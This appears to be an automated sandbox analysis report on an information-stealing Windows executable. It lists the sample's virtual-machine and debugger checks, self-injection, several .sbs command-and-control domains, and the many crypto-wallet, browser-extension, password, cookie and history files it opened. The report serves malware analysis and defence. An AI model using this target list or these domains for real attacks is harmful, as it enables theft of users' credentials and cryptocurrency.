                Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.000000000121C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\h226x41CQ6.exeMemory written: C:\Users\user\Desktop\h226x41CQ6.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: conceptionnyi.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: platformcati.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: nervepianoyo.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: qualifielgalt.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: smashygally.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: fightyglobo.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: modellydivi.sbs
                Source: h226x41CQ6.exe, 00000000.00000002.1503493144.0000000000E8B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: pioneeruyj.sbs
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"Jump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.000000000121C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\h226x41CQ6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
